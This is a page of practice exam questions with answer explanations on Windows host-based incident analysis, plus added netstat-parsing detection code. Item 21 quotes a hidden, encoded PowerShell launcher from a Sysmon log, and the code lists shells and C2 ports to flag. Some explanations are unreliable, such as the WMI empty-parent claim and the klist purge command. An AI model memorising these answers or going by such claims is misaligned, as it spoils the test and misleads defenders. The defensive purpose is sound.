Drag and drop the steps to investigate a security incident using a SIEM into the correct order.

Order

1. Identify
2. Collect
3. Analyze
4. Contain
5. Document

Why this order

Incident investigation: identify, collect, analyze, contain, document. The SIEM alert or correlation surfaces the incident, the analyst gathers and examines the relevant log and host evidence before acting, containment is applied to the hosts and accounts that analysis shows are involved, and documentation records what was found and done.

15
Matching · medium

Match each Windows event log type to its description.

Pairings

Security: Logs success/failure audit events
System: Logs operating system events
Application: Logs events from applications
Setup: Logs installation events
Forwarded Events: Logs events forwarded from other computers

Why these pairings

These are the standard Windows Event Log channels listed under Windows Logs in Event Viewer. Security is the channel that holds the logon and object-access audit records referenced elsewhere on this page (Event IDs 4624, 4625, 4663 and 4688); Forwarded Events is populated only when event subscriptions from other hosts are configured.

16
MCQ · medium

Based on the exhibit, what is the most likely conclusion about the host's security state?

A.The svchost.exe process on UDP port 4444 indicates a Windows service that should be monitored.
B.The established TCP connection to 203.0.113.5 indicates data exfiltration to a known malicious IP.
C.The host is running a legitimate remote administration tool on port 4444.
D.The host has a backdoor listening on UDP port 4444, and the established connection suggests an active command session via cmd.exe.
Answer: D

The combination of UDP listener and cmd.exe connection to external IP is highly suspicious.

Why this answer

The exhibit shows svchost.exe listening on UDP port 4444 and an established TCP connection to 203.0.113.5 owned by cmd.exe. svchost.exe does legitimately open UDP sockets for services such as the DHCP client (UDP 68), LLMNR (UDP 5355) and SSDP (UDP 1900), so the anomaly is the port rather than the protocol: no Windows service hosted by svchost.exe listens on 4444, which is the default listener port of Metasploit and many backdoors. More telling is the established connection owned by cmd.exe, which means a command interpreter has a socket to an external host, the classic picture of an interactive remote shell. Together, a non-standard listener under a system process name and an active cmd.exe connection strongly suggest the host is compromised with a backdoor providing remote command execution.

Exam trap

Cisco often tests the misconception that svchost.exe is always legitimate; the trap here is that a listener on a port no Windows service uses, combined with an established cmd.exe connection, is a strong indicator of a backdoor rather than a normal Windows service or remote admin tool.

How to eliminate wrong answers

Option A is wrong because no service hosted by svchost.exe listens on UDP port 4444; the UDP ports svchost.exe normally owns belong to identifiable services (DHCP client, LLMNR, SSDP), and netstat -b or tasklist /svc would show the service name, so an unattributed listener on 4444 is anomalous and indicative of malware masquerading as a system process. Option B is wrong because while the TCP connection to 203.0.113.5 is suspicious, the exhibit does not provide evidence that this IP is known malicious or that data exfiltration is occurring; the primary indicator is the cmd.exe process tied to the connection, suggesting an interactive shell rather than bulk data transfer. Option C is wrong because legitimate remote administration tools (e.g., RDP on TCP 3389, SSH on TCP 22) do not use UDP port 4444, and svchost.exe is not a remote administration binary; the presence of cmd.exe on the established connection points to an unauthorized command session.

17
Multi-Select · easy

A security analyst is investigating a host that is suspected of being compromised. The analyst runs a series of commands to gather information. Which TWO of the following commands are most useful for collecting volatile data from a live Windows system? (Choose two.)

Select 2 answers
A.netstat -anob
B.tasklist /svc
C.dir /s C:\Windows\System32\config
D.wevtutil qe System /c:10
E.reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Answers: A, B

netstat -anob shows active network connections with owning PIDs and executables; tasklist /svc maps each PID to the services it hosts. Both read state that exists only in memory.

Why this answer

The `netstat -anob` command displays active network connections, listening ports, and the associated process IDs (PIDs) along with the executable name (the `-b` switch needs an elevated prompt). This is critical for identifying unauthorized outbound connections or backdoor listeners that indicate compromise. Because network state and process-to-port mappings reside in volatile memory (RAM), they are lost on reboot, making this command essential for live forensic collection.

The `tasklist /svc` command lists every running process with its PID and, for service host processes, the services running inside it. This process and service state likewise exists only in memory and must be captured before the machine is powered down; it is also what lets the analyst tell a svchost.exe that hosts a known service from one that hosts nothing. Options C, D and E read artifacts that persist on disk (the registry hives under System32\config, the event log files, and the Run key), so they remain available from an offline disk image and are not the priority during live collection.

Exam trap

Cisco often tests the distinction between volatile (memory-resident) and non-volatile (disk-based) data, and the trap here is that candidates mistakenly treat registry queries or event log exports as volatile because they are commonly used in live response, when in fact they read persistent disk artifacts.
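As an added example (not from the original page), a parser for the text that `netstat -anob` prints, serving questions 7, 13, 16 and 17: it pairs each socket with the service components and owning executable that `-b` appends, then applies the reasoning those questions describe (a shell owning an established connection, a suspicious remote port, an svchost.exe socket with no hosted service). The netstat excerpt and addresses are constructed; the shell list and suspect port set are assumptions.

```python
import re

# Constructed excerpt of `netstat -anob` output (elevated prompt on the host).
# With -b, the lines after each socket name the hosted service component(s),
# if any, and then the owning executable in square brackets.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  RpcSs
 [svchost.exe]
  TCP    10.0.0.5:49712         203.0.113.5:4444       ESTABLISHED     4120
 [cmd.exe]
  TCP    10.0.0.5:49801         198.51.100.20:443      ESTABLISHED     1204
  wuauserv
 [svchost.exe]
  UDP    0.0.0.0:4444           *:*                                    1540
 [svchost.exe]
  UDP    0.0.0.0:68             *:*                                    1204
  Dhcp
 [svchost.exe]
"""

_SOCKET = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")
_IMAGE = re.compile(r"^\s*\[(.+)\]\s*$")

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}   # assumption: interpreters that should not own sockets
SUSPECT_REMOTE_PORTS = {4444}                        # Metasploit's default listener; extend from intel


def parse_netstat(text):
    """Return one dict per socket line, with the -b attribution attached."""
    records, current = [], None
    for line in text.splitlines():
        m = _SOCKET.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            current = {"proto": proto, "local": local, "remote": remote,
                       "state": state or "", "pid": int(pid), "image": None, "components": []}
            records.append(current)
            continue
        if current is None:
            continue                                 # still in the header
        m = _IMAGE.match(line)
        if m:
            current["image"] = m.group(1).lower()
        elif line.strip() and "ownership information" not in line:
            current["components"].append(line.strip())   # service name(s) hosted by the PID
    return records


def port(addr):
    """Port number of 'host:port' (IPv6 '[::]:port' included), or None for '*:*'."""
    p = addr.rsplit(":", 1)[-1]
    return int(p) if p.isdigit() else None


def netstat_findings(records):
    """[(pid, proto, local, [reason, ...])] for sockets that deserve a look."""
    findings = []
    for r in records:
        reasons = []
        if r["state"] == "ESTABLISHED" and r["image"] in SHELLS:
            reasons.append(f"{r['image']} owns an established connection to {r['remote']}")
        if r["state"] == "ESTABLISHED" and port(r["remote"]) in SUSPECT_REMOTE_PORTS:
            reasons.append(f"remote port {port(r['remote'])} is a known default C2 port")
        if r["image"] == "svchost.exe" and not r["components"]:
            reasons.append("svchost.exe socket with no hosted service name")
        if reasons:
            findings.append((r["pid"], r["proto"], r["local"], reasons))
    return findings


if __name__ == "__main__":
    for pid, proto, local, reasons in netstat_findings(parse_netstat(SAMPLE_NETSTAT)):
        print(pid, proto, local, "; ".join(reasons))
```

The service-name lines are the part most people ignore: a genuine svchost.exe socket is attributed to RpcSs, Dhcp, wuauserv and so on, while an injected or renamed one has nothing to show, which is exactly the distinction question 13 asks for.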

18
MCQ · hard

During a host-based analysis of a Windows system, an analyst finds that the Windows Event ID 4688 (process creation) logs show a child process spawning from a legitimate application, but the parent process path is empty. What does this likely indicate?

A.The parent process was terminated immediately after spawning
B.The process was spawned via a WMI call without a parent path
C.The event log is corrupted
D.The process is a kernel thread
Answer: B

WMI spawns often result in empty parent path fields.

Why this answer

When a process is spawned via Windows Management Instrumentation (WMI), the parent process path is often empty in Event ID 4688 logs because WMI creates the child process in a way that does not preserve the standard parent-child relationship. This occurs because WMI uses the `Win32_Process.Create` method, which runs under the WMI provider host process (WmiPrvSE.exe) but does not populate the parent process path field in the security log. The empty parent path is a strong indicator of WMI-based process creation, which is commonly used for lateral movement or persistence by attackers. In practice, corroborate with Sysmon Event ID 1, whose ParentImage field comes from Sysmon's own process tracking, and with the Microsoft-Windows-WMI-Activity/Operational log; the Creator Process Name field of 4688 is resolved against the live process table when the event is written and is absent altogether on versions older than Windows 10 / Server 2016.

Exam trap

Cisco often tests the misconception that an empty parent path indicates log corruption or a terminated parent, but the correct interpretation is that WMI-based process creation deliberately omits the parent path in Event ID 4688.

How to eliminate wrong answers

Option A is wrong because if the parent process were terminated immediately after spawning, the parent process ID (PPID) would still be recorded in the event log, and the parent process path would not be empty—it would show the path of the terminated process. Option C is wrong because event log corruption would typically manifest as missing events, garbled data, or error codes, not as a consistently empty parent process path for a specific event type. Option D is wrong because kernel threads are not user-mode processes and do not generate Event ID 4688 logs; they are managed by the kernel and appear in different log sources or not at all.

19
MCQ · easy

A SOC analyst is investigating a suspicious file on a Windows host. The file hash matches a known malware variant in a threat intelligence feed. What is the next best step for host-based analysis?

A.Run a full antivirus scan on the host
B.Disable the network adapter to prevent further communication
C.Check for persistence mechanisms such as registry Run keys or scheduled tasks
D.Reboot the host to clear the malware from memory
Answer: C

Malware often adds persistence. Examining startup locations helps determine scope and removal.

Why this answer

Option C is correct because after confirming a file hash matches a known malware variant, the immediate priority for host-based analysis is to determine how the malware maintains persistence on the system. Persistence mechanisms such as Registry Run keys (e.g., HKCU\Software\Microsoft\Windows\CurrentVersion\Run and its HKLM and RunOnce counterparts) or scheduled tasks (via schtasks.exe) allow malware to survive reboots and re-establish execution. Identifying these artifacts is critical for containment and eradication, as it reveals the malware's foothold and prevents re-infection after removal. On the host, `reg query` on each Run key and `schtasks /query /fo LIST /v` are the built-in ways to enumerate them; compare every entry's image path and command line against the matched file and the directory it was found in.

Exam trap

Cisco often tests the distinction between host-based analysis (focusing on local artifacts like persistence, processes, and registry) and network-based containment (like disabling adapters), so candidates mistakenly choose network isolation steps when the question explicitly asks for host-based analysis.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan is reactive and may not detect the specific malware variant if signatures are outdated or if the malware employs evasion techniques like packing or polymorphism; the hash match already confirms maliciousness, so scanning adds no new forensic value. Option B is wrong because disabling the network adapter is a network-based containment step, not a host-based analysis step; while it may prevent C2 communication, the question specifically asks for the next best step in host-based analysis, which should focus on understanding the malware's local impact and persistence. Option D is wrong because rebooting the host may clear malware from memory (e.g., fileless malware), but it destroys volatile evidence such as running processes, network connections, and memory-resident artifacts, and it does not address persistence mechanisms that would cause the malware to reload on startup.

20
MCQ · easy

An analyst needs to review the Windows event logs from a host to determine if a user's account was used to log in at an unusual time. Which log type should the analyst check?

A. Application
B. System
C. Setup
D. Security
Answer: D

Security log records logon/logoff events.

Why this answer

The Security log in Windows Event Viewer records audit events, including successful and failed logon attempts (Event ID 4624 for successful logons). This log type is the correct source for determining if a user's account was used to log in at an unusual time, as it captures the timestamp and details of each authentication event.

Exam trap

Cisco often tests the distinction between the Security log (which records authentication events) and the System log (which records system-level events), leading candidates to mistakenly choose the System log for logon analysis.

How to eliminate wrong answers

Option A is wrong because the Application log records events from applications and programs, not authentication or logon activities. Option B is wrong because the System log records events from Windows system components (e.g., driver failures, service starts), not user logon events. Option C is wrong because the Setup log records events related to Windows installation and updates, not user authentication or logon activity.

21
MCQ · hard

A company's security team is investigating an alert from their EDR platform indicating that a workstation in the finance department has been making repeated connections to an external IP address associated with a known command-and-control (C2) server. The analyst has isolated the host from the network and is performing host-based analysis. The host is running Windows 10 with Sysmon deployed and Windows Event Logging enabled. The analyst reviews Sysmon events and finds:

- Event ID 1 (Process Creation): 'powershell.exe -NoP -NonI -W Hidden -Enc JABzAD0ATgBlAHcALQBPAEI ...' (long encoded string)
- Event ID 3 (Network Connect): powershell.exe connecting to the C2 IP on port 443 (HTTPS), and also to an internal IP on port 445 (SMB).
- Event ID 11 (FileCreate): a file created at C:\Users\financeuser\AppData\Roaming\Microsoft\svchost.exe (size 512KB) with no signature.
- Event ID 7 (Image Load): svchost.exe (from AppData) loaded 'crypt32.dll'.
- Event ID 8 (CreateRemoteThread): not observed.

The analyst also checks the Windows Security log and finds Event ID 4624 (Success Logon) for the user 'financeuser' from a remote workstation at 2:00 AM, which is outside normal hours. The workstation is part of the Active Directory domain. The analyst needs to determine the most effective next step to contain the threat and prevent recurrence.

A. Isolate the host further by blocking all inbound and outbound traffic via the host firewall, then perform memory acquisition and deep forensic analysis before remediation.
B. Remove the malicious svchost.exe file and kill the powershell process, then run a full antivirus scan.
C. Power off the workstation and reimage it immediately, then reset the user's password.
D. Change the user's password, revoke all Kerberos tickets, and check for lateral movement using the SMB connection observed.
Answer: D

The SMB connection suggests lateral movement; resetting credentials and revoking tickets prevents further abuse of the account.

Why this answer

Option D is correct because the SMB connection (port 445) to an internal IP strongly indicates lateral movement via techniques like PsExec or scheduled tasks. Changing the user's password and revoking Kerberos tickets (e.g., using `klist -li 0x3e7 purge`) immediately cuts off the attacker's authenticated access, while checking for lateral movement addresses the broader compromise. This aligns with the NIST incident response containment phase, prioritizing credential and token revocation over file deletion or reimaging alone.

Exam trap

Cisco often tests the distinction between host-level containment (e.g., deleting files) and domain-level containment (e.g., credential revocation), where candidates mistakenly choose a simple file removal or reimage without addressing the broader authentication compromise indicated by the SMB connection and off-hours logon.

How to eliminate wrong answers

Option A is wrong because the host is already isolated from the network; further firewall blocking is redundant, and memory acquisition is a forensic step, not containment. Option B is wrong because simply removing the file and killing the process does not address the compromised credentials or potential lateral movement via SMB; the attacker could re-authenticate or have already moved to other hosts. Option C is wrong because powering off and reimaging destroys volatile evidence and does not revoke the attacker's access via Kerberos tickets or changed passwords, allowing them to persist in the domain.

22
MCQ · medium

A company's endpoint detection and response (EDR) agent is reporting a file that was created with a name matching a known ransomware pattern. The analyst suspects the file is malicious. What is the best first step to contain the threat?

A. Create a new firewall rule
B. Isolate the host from the network
C. Run a full antivirus scan
D. Delete the file
Answer: B

Isolation prevents lateral movement and C2 communication.

Why this answer

Isolating the host from the network is the best first step because it immediately stops the ransomware from communicating with its command-and-control (C2) server and prevents lateral movement to other systems. The EDR agent has already flagged the file as suspicious, so the priority is containment, not further analysis or deletion, which could trigger the ransomware to encrypt data. Network isolation breaks the attack chain at the host level, buying time for forensic analysis and remediation.

Exam trap

Cisco often tests the principle of 'containment before eradication'; the trap here is that candidates choose to delete the file or run a scan, thinking that removing the artifact stops the threat, but they overlook that the ransomware may already be executing in memory or have established persistence.

How to eliminate wrong answers

Option A is wrong because creating a new firewall rule is a network-level control that takes time to implement and may not block all outbound traffic from the already-compromised host, especially if the ransomware uses dynamic ports or encrypted tunnels. Option C is wrong because running a full antivirus scan is a detection and remediation step that occurs after containment; the file is already suspected malicious, and scanning could trigger the ransomware to execute and encrypt files. Option D is wrong because deleting the file without first isolating the host may not stop the ransomware if it is already running in memory, and it could also trigger a failsafe mechanism that encrypts data immediately.

23
MCQ · medium

An organization uses Windows 10 Enterprise workstations with standard user accounts (no local admin). Users run daily tasks including web browsing, document editing, and accessing a corporate intranet. Recently, the security team detected anomalous outbound traffic from one workstation to an IP address in a foreign country. The workstation's host-based firewall shows that a process named 'svch0st.exe' initiated the connection. Additionally, a scheduled task named 'UpdateTask' runs every hour with SYSTEM privileges, executing a script from a hidden folder. The user reports no unusual behavior except occasional system slowdowns. The analyst must determine the best immediate course of action. Which action should the analyst take first?

A. Run an antivirus scan and if nothing is found, ignore the alert as a false positive
B. Immediately disconnect the workstation from the network and perform a full system restore from a known good backup
C. Delete the scheduled task and the script from the hidden folder, then reboot the workstation
D. Disable the scheduled task and terminate the svch0st.exe process, then collect a forensic image of the workstation for further analysis
Answer: D

This stops malicious activity while preserving the script and other evidence on disk for later analysis.

Why this answer

Option D is correct because the immediate priority is to contain the threat by disabling the scheduled task and terminating the malicious process (svch0st.exe) to stop further outbound communication, while preserving the system state for forensic analysis. Collecting a forensic image ensures that evidence (e.g., the script, scheduled task artifacts, and network logs) is not destroyed, allowing the security team to perform root-cause analysis and determine the full scope of the compromise. This approach balances containment with evidence preservation, which is critical in incident response.

Exam trap

Cisco often tests the distinction between containment (stopping the active threat) and eradication (removing files), where candidates mistakenly choose to delete artifacts immediately (Option C) instead of first containing the process and preserving evidence for analysis.

How to eliminate wrong answers

Option A is wrong because relying solely on an antivirus scan is insufficient; the process 'svch0st.exe' mimics legitimate 'svchost.exe' and may evade signature-based detection, and ignoring the alert could allow persistent access. Option B is wrong because immediately disconnecting and restoring from backup destroys volatile evidence (e.g., running processes, memory contents, and scheduled task details) needed for forensic analysis, and may not remove the threat if the backup is also compromised. Option C is wrong because deleting the scheduled task and script without first containing the active process (svch0st.exe) allows the malware to continue running and potentially re-establish persistence or exfiltrate data; also, rebooting may destroy evidence in memory.

24
MCQ · easy

Refer to the exhibit. An analyst runs the command 'tasklist /svc /fi "PID eq 1234"' on a Windows host and receives the output shown. Which conclusion can the analyst draw from this output?

A. The process is a third-party application
B. The process is using excessive CPU resources
C. The process is a legitimate Windows service host
D. The process is likely malware masquerading as svchost.exe
Answer: C

svchost.exe is a legitimate Windows process that hosts multiple system services.

Why this answer

The 'tasklist /svc /fi "PID eq 1234"' command filters for a specific PID and displays the associated services. The output shows 'svchost.exe' with the service 'DcomLaunch', which is a core Windows component responsible for launching COM and DCOM services. This confirms the process is a legitimate Windows service host, not a third-party application or malware.

Exam trap

Cisco often tests the misconception that any svchost.exe process is suspicious or malware, but the key is to recognize that legitimate svchost.exe instances host specific Windows services and are identified by their associated service names and standard system paths.

How to eliminate wrong answers

Option A is wrong because the output shows 'svchost.exe', which is a native Windows system binary, not a third-party application. Option B is wrong because the 'tasklist /svc' command does not display CPU usage; it only shows process name, PID, and associated services, so no conclusion about CPU resource consumption can be drawn. Option D is wrong because while malware can masquerade as svchost.exe, the presence of the legitimate 'DcomLaunch' service and the process running from the standard 'C:\Windows\System32' directory (implied by the output) strongly indicates it is not masquerading; a masquerading process would typically not have the correct service association or path.

25
MCQ · hard

Refer to the exhibit. A host-based analysis tool outputs a JSON report. Which persistence mechanism is being used?

A. Windows Service
B. Startup Folder
C. Registry Run Key
D. Scheduled Task
Answer: C

The HKLM...Run key is a common startup persistence location.

Why this answer

The JSON report shows a registry key modification under `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`, which is a standard Registry Run Key. This key automatically launches the specified executable (`C:\Users\malware\app.exe`) at user logon, making it a persistence mechanism. The `"Value":"C:\\Users\\malware\\app.exe"` confirms the payload path, and the value name `"MaliciousService"` is irrelevant to the actual mechanism.

Exam trap

Cisco often tests the distinction between registry-based persistence (Run keys) and service-based persistence, where candidates mistakenly associate the word 'Service' in a key name with a Windows Service, but the actual mechanism is determined by the registry path, not the value name.

How to eliminate wrong answers

Option A is wrong because a Windows Service requires installation via `sc create` or the Service Control Manager, and the JSON shows no `ImagePath` under `SYSTEM\CurrentControlSet\Services` or `Start` type values; a Run key is not a service. Option B is wrong because the Startup Folder uses a shortcut file in `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`, not a registry key; the JSON explicitly references a registry path. Option D is wrong because a Scheduled Task is defined in `\Windows\System32\Tasks` or via `schtasks.exe` with XML triggers, not a simple registry value under `Run`; the JSON lacks task-specific fields like `Triggers` or `Actions`.

26
Drag & Drop · medium

Drag and drop the steps to configure a Cisco ASA firewall for basic network access into the correct order.


Why this order

ASA config: global config, set interfaces, create ACL, apply ACL, verify.

27
MCQ · easy

Refer to the exhibit. An analyst runs tasklist /SVC on a suspected host. Which process is most suspicious?

A. svchost.exe with PID 1500
B. svchost.exe with PID 1240
C. notmalware.exe with PID 2300
D. svchost.exe with PID 1780
Answer: C

Unusual name and no associated services; likely disguised malware.

Why this answer

Option C is correct because 'notmalware.exe' is a deliberately suspicious process name that does not correspond to any legitimate Windows system binary. The tasklist /SVC command displays processes and their associated services; a process named 'notmalware.exe' is a clear indicator of potential malware attempting to disguise itself with an ironic name, whereas svchost.exe is a legitimate Windows host process for services.

Exam trap

Cisco often tests the misconception that multiple svchost.exe processes are inherently suspicious, when in fact Windows normally runs many svchost instances, and the real red flag is a process with a clearly fabricated name like 'notmalware.exe'.

How to eliminate wrong answers

Option A is wrong because svchost.exe with PID 1500 is a legitimate Windows system process that hosts multiple services; its presence alone is not suspicious without additional indicators like unusual parent process or high resource usage. Option B is wrong because svchost.exe with PID 1240 is also a normal svchost instance; multiple svchost.exe processes are expected in Windows as each hosts one or more services. Option D is wrong because svchost.exe with PID 1780 is another legitimate svchost instance; the tasklist /SVC output shows these are associated with standard services, making them not inherently suspicious.

28
MCQ · medium

Refer to the exhibit. A network analyst sees repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23. Based on the log, what type of activity is most likely occurring?

A. DNS amplification attack
B. ARP spoofing
C. Brute force attempt on Telnet service
D. ICMP flood attack
Answer: C

Multiple connection attempts to port 23 (Telnet) from the same source indicate brute-force or scanning activity.

Why this answer

The log shows repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23, which is the default port for Telnet. Multiple failed connection attempts to a Telnet service indicate a brute force attack, where an attacker tries to guess credentials by repeatedly attempting to log in.

Exam trap

Cisco often tests the association of default port numbers with services (port 23 = Telnet) and expects candidates to recognize that repeated connection attempts to a login service indicate a brute force attack, not a flood or spoofing attack.

How to eliminate wrong answers

Option A is wrong because a DNS amplification attack uses spoofed source IPs to send small queries to open DNS resolvers, causing large responses to flood a victim; it does not involve repeated direct connections to port 23. Option B is wrong because ARP spoofing involves sending forged ARP replies to associate the attacker's MAC address with a legitimate IP, enabling man-in-the-middle attacks, not repeated Telnet login attempts. Option D is wrong because an ICMP flood attack overwhelms a target with ICMP echo request packets (ping floods), not with TCP connection attempts to port 23.

29
MCQ · hard

An analyst is reviewing Sysmon logs from a compromised host. They see Event ID 1 (Process creation) for cmd.exe with parent process winword.exe. What does this indicate?

A. The Windows Update service initiated cmd from Word
B. The user launched cmd.exe manually from within Word using a shortcut
C. Word crashed and created a dump file using cmd
D. A macro in a Word document executed cmd.exe as part of the attack
Answer: D

Common technique: macro calls cmd to download or execute payload.

Why this answer

Event ID 1 (Process creation) with parent process winword.exe spawning cmd.exe is a classic indicator of a macro-based attack. Microsoft Word is not designed to launch command-line interpreters under normal operation; when cmd.exe appears as a child of winword.exe, it strongly suggests that a malicious macro within the document executed a shell command, often to download payloads, escalate privileges, or perform reconnaissance. This aligns with common phishing and malware delivery techniques where attackers embed VBA macros to execute system commands.

Exam trap

Cisco often tests the distinction between normal application behavior and process injection or parent-child anomalies; the trap here is assuming that any cmd.exe launch is benign or user-initiated, when the parent process (winword.exe) is the key indicator of macro-based compromise.

How to eliminate wrong answers

Option A is wrong because Windows Update runs as a system service (svchost.exe or trustedinstaller.exe), not as a child of winword.exe; there is no mechanism for Windows Update to initiate cmd.exe from Word. Option B is wrong because manually launching cmd.exe from within Word via a shortcut would still show the parent process as explorer.exe or the user's shell, not winword.exe; Word does not become the parent process for user-initiated commands outside its own UI. Option C is wrong because Word crash dumps are typically created by Windows Error Reporting (WerFault.exe) or the process itself, not by spawning cmd.exe; a crash dump does not involve launching a command shell.

30
Multi-Select · easy

Which TWO host-based analysis techniques are most effective for detecting fileless malware?

Select 2 answers
A. Process memory analysis to detect injected code
B. Network traffic analysis
C. Signature-based file scanning
D. Registry analysis for persistence
E. PowerShell script block logging
Answers: A, E

Fileless malware often injects code into memory.

Why this answer

Process memory analysis (A) is effective because fileless malware resides in memory without writing to disk, so examining running processes for injected code, suspicious memory regions, or anomalous API calls can directly detect the malicious payload. PowerShell script block logging (E) captures the full text of PowerShell commands executed, including obfuscated or encoded scripts that fileless malware often uses to load payloads directly into memory, making it a powerful host-based detection technique.

Exam trap

Cisco often tests the distinction between host-based and network-based analysis techniques, and the trap here is that candidates may select network traffic analysis (B) because it can detect fileless malware's network activity, but the question specifically asks for host-based techniques, making B incorrect.

31
Multi-Select · medium

Which THREE indicators in Windows Event Log are most commonly associated with a successful compromise?

Select 3 answers
A. Event ID 4740: A user account was locked out
B. Event ID 4720: A user account was created
C. Event ID 7045: A service was installed in the system
D. Event ID 4624: An account was successfully logged on
E. Event ID 5156: The Windows Filtering Platform allowed a connection
Answers: B, C, D

Creation of new accounts by an attacker for persistence.

Why this answer

Event ID 4720 indicates a new user account was created, which is a common post-compromise action where an attacker establishes persistence by adding a backdoor account. Event ID 7045 logs when a new service is installed, often used by malware or attackers to maintain persistence or execute code with system privileges. Event ID 4624 records successful logon events, which after a compromise may show anomalous logons (e.g., from unexpected IPs, off-hours, or using compromised credentials).

Exam trap

Cisco often tests the distinction between events that indicate a successful compromise (e.g., account creation, service installation, successful logon) versus events that indicate failed attempts or normal operations, leading candidates to mistakenly select lockout or firewall allow events as compromise indicators.

32
MCQ · hard

An analyst is performing host-based analysis on a machine that is part of a botnet. The machine is communicating with a C2 server over HTTPS. Which host-based evidence would be most useful to identify the C2 communication?

A. Packet capture showing the unencrypted payload
B. A memory dump of the process showing encryption keys
C. DNS logs showing queries to the C2 domain
D. Windows Event ID 5157 (Filtering Platform connection) showing the process ID
Answer: C

DNS queries often precede HTTPS connections. The domain may be unique or malicious.

Why this answer

Option C is correct because DNS logs can reveal the domain name used for C2 communication even when the traffic is encrypted over HTTPS. Since the analyst is performing host-based analysis, DNS query logs on the host itself (e.g., from the DNS client service or a local DNS resolver) will show the host attempting to resolve the C2 domain, providing a direct indicator of the C2 server's address without needing to decrypt the HTTPS traffic.

Exam trap

Cisco often tests the misconception that encrypted traffic cannot be analyzed at all, leading candidates to choose options like packet capture or memory dumps, when in fact DNS logs provide a clear, host-based indicator of C2 communication without requiring decryption.

How to eliminate wrong answers

Option A is wrong because HTTPS traffic is encrypted, so a packet capture on the host would not show the unencrypted payload; the analyst would need to decrypt the session, which is not feasible without the private key or a man-in-the-middle proxy. Option B is wrong because while a memory dump might contain encryption keys if the process stores them in plaintext, this is not a reliable or standard method for identifying C2 communication; it requires deep forensic analysis and the keys may not be present or easily extractable. Option D is wrong because Windows Event ID 5157 (Filtering Platform connection) logs the process ID and connection details, but it does not include the domain name or URL; it only shows IP addresses and ports, which may not directly identify the C2 server if it uses dynamic IPs or CDN fronting.

33
MCQ · easy

A security analyst is analyzing a memory dump from a compromised Linux server. Which tool is most appropriate for extracting running processes and network connections from the dump?

A. volatility
B. nmap
C. Wireshark
D. tcpdump
Answer: A

Volatility can analyze memory dumps to extract process and network information.

Why this answer

Volatility is the correct tool because it is a specialized memory forensics framework designed to analyze RAM dumps. It can extract a list of running processes (via the `pslist` or `pstree` plugins) and active network connections (via the `netscan` or `connscan` plugins) directly from the memory image, without relying on the live system's kernel data structures which may be compromised.

Exam trap

Cisco often tests the distinction between live network analysis tools (nmap, Wireshark, tcpdump) and memory forensics tools (Volatility), expecting candidates to recognize that only Volatility can extract process and connection artifacts from a static memory dump.

How to eliminate wrong answers

Option B (nmap) is wrong because it is a network scanning tool used to discover hosts and services on a live network, not for analyzing a static memory dump. Option C (Wireshark) is wrong because it captures and analyzes live network traffic from a network interface, not from a memory dump file. Option D (tcpdump) is wrong because it is a command-line packet analyzer that captures live network packets, and it cannot parse a memory dump to extract processes or connections.

34
MCQ · easy

A security analyst notices that a workstation is generating multiple DNS queries to a known malicious domain. Which host-based analysis technique would be most effective in confirming the infection?

A. Review the Windows Firewall logs to see blocked connections
B. Check the scheduled tasks for suspicious entries
C. Use Process Explorer to examine the process responsible for the DNS queries
D. Analyze the Windows Event Log for Event ID 5156
Answer: C

Process Explorer can show network activity per process, directly linking the DNS queries to a specific executable.

Why this answer

Process Explorer is a host-based analysis tool that provides detailed information about running processes, including their network connections and DNS queries. By examining the process responsible for the DNS queries to the known malicious domain, the analyst can directly identify the infected executable or script, confirming the infection at the process level.

Exam trap

Cisco often tests the distinction between host-based analysis tools (like Process Explorer) and log-based analysis (like firewall or event logs), trapping candidates who choose a log-based option when a process-level tool is needed to confirm the infection source.

How to eliminate wrong answers

Option A is wrong because Windows Firewall logs only show blocked connections, but the DNS queries are likely succeeding (generating traffic), so blocked connections would not capture the malicious activity. Option B is wrong because scheduled tasks are a persistence mechanism, not the immediate source of active DNS queries; the infection may not rely on scheduled tasks. Option D is wrong because Event ID 5156 logs successful outbound connections, but it does not link the connection to a specific process or DNS query, making it less effective for pinpointing the responsible process.

35
MCQ · easy

Which Windows registry hive is most likely to contain evidence of malware persistence via a service?

A. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
C. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
D. HKEY_LOCAL_MACHINE\SAM
Answer: B

This hive stores service configurations, including the path to the executable.

Why this answer

The HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services registry hive stores the configuration for all Windows services, including their executable paths and startup types. Malware often installs itself as a service to achieve persistence, and evidence of this can be found by examining the ImagePath value under a suspicious service subkey. This is the correct location for service-based persistence, unlike the Run keys which handle startup programs for users.

Exam trap

Cisco often tests the distinction between Run keys (user logon persistence) and Services keys (system service persistence), and the trap here is that candidates confuse the Run keys with service persistence because both are common persistence mechanisms, but only the Services hive stores service-specific configurations.

How to eliminate wrong answers

Option A is wrong because HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run is used for auto-starting programs at user logon, not for services; malware using this key persists via Run registry entries, not as a service. Option C is wrong because HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run is a per-user Run key that only affects the currently logged-in user, not system-wide service persistence. Option D is wrong because HKEY_LOCAL_MACHINE\SAM stores Security Account Manager data (user and group hashes) and is not related to service configuration or persistence mechanisms.
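To make concrete the point shared by questions 19, 25 and 35, that the registry path or file location decides the persistence mechanism while the value name is irrelevant, here is an added classifier (example code, not from the question bank) that walks a constructed JSON artifact report and labels each entry as Run key, Windows Service, Startup Folder or Scheduled Task, flagging payloads that live in user-writable directories. The report layout and every entry in it are assumptions.

```python
"""Classify persistence artifacts from a host-analysis JSON report by location.

Added example, not from the question bank. The report layout (an "Artifacts"
list with Type/Key/ValueName/Value or Type/Path/Target fields) is an assumption
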